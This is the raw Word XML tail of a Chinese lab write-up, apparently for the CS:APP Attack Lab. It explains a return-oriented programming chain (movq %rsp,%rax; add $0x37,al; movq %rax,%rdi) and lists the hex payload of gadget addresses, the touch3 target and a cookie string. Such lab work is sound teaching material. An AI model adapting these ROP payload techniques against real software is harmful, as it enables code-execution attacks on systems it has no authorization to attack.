          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="058259B2" wp14:editId="74B7B36A">
            <wp:extent cx="4770533" cy="1752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F5E7" w14:textId="64153CAE" w:rsidR="003677AC" w:rsidRDefault="003677AC" w:rsidP="00E84F13">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">4 37 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这刚好是al</w:t>
      </w:r>
      <w:r>
        <w:t>+0x37</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的gadget，这个大小也是非常合适的，在尽量保证能够全覆盖的情况下保证payload越小越好，大了容易出事。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC5BE8F" w14:textId="277558EA" w:rsidR="00BB3211" w:rsidRDefault="00BB3211" w:rsidP="00E84F13">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>那么如此我们就只到我们重新堆的代码结构了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE0C0D4" w14:textId="2BDBE79F" w:rsidR="00BB3211" w:rsidRDefault="00B85254" w:rsidP="00E84F13">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>m</w:t>
      </w:r>
      <w:r>
        <w:t>ovq %rsp,%rax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5187D1" w14:textId="5B5072D5" w:rsidR="00B85254" w:rsidRDefault="00B85254" w:rsidP="00E84F13">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>dd $0x37,al</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38522C99" w14:textId="1294B954" w:rsidR="00B85254" w:rsidRDefault="007C2500" w:rsidP="00E84F13">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>m</w:t>
      </w:r>
      <w:r>
        <w:t>ovq %rax,%rdi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E9685CF" w14:textId="0806A374" w:rsidR="007C2500" w:rsidRDefault="00E5000E" w:rsidP="00E84F13">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r>
        <w:t>et</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A54686B" w14:textId="22DBA8D4" w:rsidR="00B85254" w:rsidRDefault="00B85254" w:rsidP="00E84F13"/>
    <w:p w14:paraId="5FE881D7" w14:textId="251420A3" w:rsidR="00307096" w:rsidRDefault="00307096" w:rsidP="00E84F13">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cookie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="208386DA" w14:textId="604AD63A" w:rsidR="0076649D" w:rsidRDefault="0076649D" w:rsidP="009C77C4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562621D9" w14:textId="2916A621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210D99B5" w14:textId="67304D4F" w:rsidR="0076649D" w:rsidRDefault="0076649D" w:rsidP="009C77C4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0B32FB0D" w14:textId="4345E806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4FDF5182" w14:textId="7CD79A98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48110685" w14:textId="302E4BA8" w:rsidR="0076649D" w:rsidRDefault="0076649D" w:rsidP="009C77C4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>06 1a 40 00</w:t>
      </w:r>
      <w:r w:rsidR="009C77C4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>00 00 00 00</w:t>
      </w:r>
      <w:r w:rsidR="00CA6DC9">
        <w:t>//</w:t>
      </w:r>
      <w:r w:rsidR="00CA6DC9" w:rsidRPr="00CA6DC9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CA6DC9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>m</w:t>
      </w:r>
      <w:r w:rsidR="00CA6DC9">
        <w:t>ovq %rsp,%rax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7221491A" w14:textId="32122A27" w:rsidR="0076649D" w:rsidRDefault="0076649D" w:rsidP="0076649D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>d8 19 40 00</w:t>
      </w:r>
      <w:r w:rsidR="009C77C4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>00 00 00 00</w:t>
      </w:r>
      <w:r w:rsidR="00CA6DC9">
        <w:t>//</w:t>
      </w:r>
      <w:r w:rsidR="00CA6DC9" w:rsidRPr="00CA6DC9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CA6DC9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="00CA6DC9">
        <w:t>dd $0x37,al</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14772049" w14:textId="304731D5" w:rsidR="0076649D" w:rsidRDefault="0076649D" w:rsidP="0076649D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>c5 19 40 00</w:t>
      </w:r>
      <w:r w:rsidR="009C77C4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>00 00 00 00</w:t>
      </w:r>
      <w:r w:rsidR="00CA6DC9">
        <w:t>//</w:t>
      </w:r>
      <w:r w:rsidR="00CA6DC9" w:rsidRPr="00CA6DC9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CA6DC9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>m</w:t>
      </w:r>
      <w:r w:rsidR="00CA6DC9">
        <w:t>ovq %rax,%rdi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589C5C64" w14:textId="03B6677F" w:rsidR="0076649D" w:rsidRDefault="0076649D" w:rsidP="0076649D">
      <w:r>
        <w:t>fa 18 40 00</w:t>
      </w:r>
      <w:r w:rsidR="009C77C4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>00 00 00 00</w:t>
      </w:r>
      <w:r w:rsidR="00CA6DC9">
        <w:t>//touch3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B7F0A7C" w14:textId="1F6FE587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16BE353A" w14:textId="00BB72F5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70FE6BA0" w14:textId="543C9A57" w:rsidR="0076649D" w:rsidRDefault="0076649D" w:rsidP="0076649D">
      <w:r>
        <w:t>00 00 00 00</w:t>
      </w:r>
      <w:r w:rsidR="009C77C4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>00 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A7B13B" w14:textId="546C4E4C" w:rsidR="0076649D" w:rsidRDefault="0076649D" w:rsidP="0076649D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>00 00 00 00</w:t>
      </w:r>
      <w:r w:rsidR="009C77C4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>00 00 00 35</w:t>
      </w:r>
      <w:r w:rsidR="009C77C4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="009C77C4">
        <w:t>/cookie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1034CB55" w14:textId="62484778" w:rsidR="0076649D" w:rsidRDefault="0076649D" w:rsidP="0076649D">
      <w:r>
        <w:t>39 62 39 39</w:t>
      </w:r>
      <w:r w:rsidR="009C77C4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>37 66 61 00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09EABF75" w14:textId="0CC387FA" w:rsidR="006B5DB3" w:rsidRPr="00E84F13" w:rsidRDefault="006B5DB3" w:rsidP="0076649D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后完结撒花啦</w:t>
      </w:r>
      <w:r w:rsidR="002357E9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>！！</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="006B5DB3" w:rsidRPr="00E8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B28F" w14:textId="77777777" w:rsidR="00226DF1" w:rsidRDefault="00226DF1" w:rsidP="00F30D32">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="6875DF15" w14:textId="77777777" w:rsidR="00226DF1" w:rsidRDefault="00226DF1" w:rsidP="00F3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A83A" w14:textId="77777777" w:rsidR="00226DF1" w:rsidRDefault="00226DF1" w:rsidP="00F30D32">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="7BAC6C14" w14:textId="77777777" w:rsidR="00226DF1" w:rsidRDefault="00226DF1" w:rsidP="00F30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7"/>
    <w:rsid w:val="00006461"/>
    <w:rsid w:val="00021284"/>
    <w:rsid w:val="00070977"/>
    <w:rsid w:val="000967DD"/>
    <w:rsid w:val="000C5F80"/>
    <w:rsid w:val="00107DB8"/>
    <w:rsid w:val="00114C28"/>
    <w:rsid w:val="0012103A"/>
    <w:rsid w:val="00131435"/>
    <w:rsid w:val="0015169E"/>
    <w:rsid w:val="001B519C"/>
    <w:rsid w:val="001D0C02"/>
    <w:rsid w:val="00216868"/>
    <w:rsid w:val="002227B2"/>
    <w:rsid w:val="00226DF1"/>
    <w:rsid w:val="002310B1"/>
    <w:rsid w:val="002357E9"/>
    <w:rsid w:val="00236035"/>
    <w:rsid w:val="00273306"/>
    <w:rsid w:val="00273948"/>
    <w:rsid w:val="00281CBE"/>
    <w:rsid w:val="002F6072"/>
    <w:rsid w:val="00307096"/>
    <w:rsid w:val="00317585"/>
    <w:rsid w:val="00327442"/>
    <w:rsid w:val="00336E24"/>
    <w:rsid w:val="00347C12"/>
    <w:rsid w:val="0035585A"/>
    <w:rsid w:val="0036557E"/>
    <w:rsid w:val="003677AC"/>
    <w:rsid w:val="0037716E"/>
    <w:rsid w:val="00386A8A"/>
    <w:rsid w:val="003B172C"/>
    <w:rsid w:val="003C6658"/>
    <w:rsid w:val="003D6E4B"/>
    <w:rsid w:val="003E6E3D"/>
    <w:rsid w:val="004061E0"/>
    <w:rsid w:val="0048324D"/>
    <w:rsid w:val="004D1AAD"/>
    <w:rsid w:val="00540225"/>
    <w:rsid w:val="00551186"/>
    <w:rsid w:val="00575522"/>
    <w:rsid w:val="005A7882"/>
    <w:rsid w:val="005C68A3"/>
    <w:rsid w:val="005F2D77"/>
    <w:rsid w:val="006000EC"/>
    <w:rsid w:val="006334FF"/>
    <w:rsid w:val="00636BBD"/>
    <w:rsid w:val="006503DC"/>
    <w:rsid w:val="006525AA"/>
    <w:rsid w:val="00655736"/>
    <w:rsid w:val="00677AE3"/>
    <w:rsid w:val="00692245"/>
    <w:rsid w:val="006B1C2E"/>
    <w:rsid w:val="006B5DB3"/>
    <w:rsid w:val="006C5DE0"/>
    <w:rsid w:val="006D6767"/>
    <w:rsid w:val="006F742F"/>
    <w:rsid w:val="0071130D"/>
    <w:rsid w:val="0076649D"/>
    <w:rsid w:val="007871C2"/>
    <w:rsid w:val="00787A8C"/>
    <w:rsid w:val="007A4B59"/>
    <w:rsid w:val="007C2500"/>
    <w:rsid w:val="007D27F3"/>
    <w:rsid w:val="007D5BCD"/>
    <w:rsid w:val="007F1ED3"/>
    <w:rsid w:val="007F29F4"/>
    <w:rsid w:val="00812EEC"/>
    <w:rsid w:val="008749ED"/>
    <w:rsid w:val="00877A20"/>
    <w:rsid w:val="0090277B"/>
    <w:rsid w:val="009052C3"/>
    <w:rsid w:val="00907231"/>
    <w:rsid w:val="00911498"/>
    <w:rsid w:val="009127AE"/>
    <w:rsid w:val="009319FF"/>
    <w:rsid w:val="00984E6D"/>
    <w:rsid w:val="00992B16"/>
    <w:rsid w:val="009A0E33"/>
    <w:rsid w:val="009B7D8E"/>
    <w:rsid w:val="009C26E4"/>
    <w:rsid w:val="009C77C4"/>
    <w:rsid w:val="009D5401"/>
    <w:rsid w:val="009E3EDD"/>
    <w:rsid w:val="009E5643"/>
    <w:rsid w:val="009F16B4"/>
    <w:rsid w:val="00A739A3"/>
    <w:rsid w:val="00A82395"/>
    <w:rsid w:val="00A944DE"/>
    <w:rsid w:val="00AA5322"/>
    <w:rsid w:val="00B26C6D"/>
    <w:rsid w:val="00B8155B"/>
    <w:rsid w:val="00B85254"/>
    <w:rsid w:val="00B96AA9"/>
    <w:rsid w:val="00BA19EB"/>
    <w:rsid w:val="00BB1A08"/>
    <w:rsid w:val="00BB3211"/>
    <w:rsid w:val="00BB69E0"/>
    <w:rsid w:val="00C04383"/>
    <w:rsid w:val="00C10327"/>
    <w:rsid w:val="00C20B8C"/>
    <w:rsid w:val="00C54BD4"/>
    <w:rsid w:val="00C63C61"/>
    <w:rsid w:val="00C64C68"/>
    <w:rsid w:val="00C92FC4"/>
    <w:rsid w:val="00CA1945"/>
    <w:rsid w:val="00CA6DC9"/>
    <w:rsid w:val="00CD12B5"/>
    <w:rsid w:val="00D07074"/>
    <w:rsid w:val="00D5508A"/>
    <w:rsid w:val="00D61F8C"/>
    <w:rsid w:val="00DC1A84"/>
    <w:rsid w:val="00DE6E7C"/>
    <w:rsid w:val="00DF6601"/>
    <w:rsid w:val="00E0111C"/>
    <w:rsid w:val="00E37E04"/>
    <w:rsid w:val="00E5000E"/>
    <w:rsid w:val="00E5194F"/>
    <w:rsid w:val="00E62F8C"/>
    <w:rsid w:val="00E84F13"/>
    <w:rsid w:val="00EC5DA0"/>
    <w:rsid w:val="00EF4F76"/>
    <w:rsid w:val="00F30569"/>
    <w:rsid w:val="00F30D32"/>
    <w:rsid w:val="00F3294B"/>
    <w:rsid w:val="00F6137A"/>
    <w:rsid w:val="00F9260D"/>
    <w:rsid w:val="00FD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F50B3"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{54C9DE44-9129-4E6F-AD83-BB7AF2E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4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4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1CB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30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琦稚</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>罗 琦稚</cp:lastModifiedBy>
  <cp:revision>116</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-04-21T04:57:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-04-24T17:44:00Z</dcterms:modified>
</cp:coreProperties>
</file>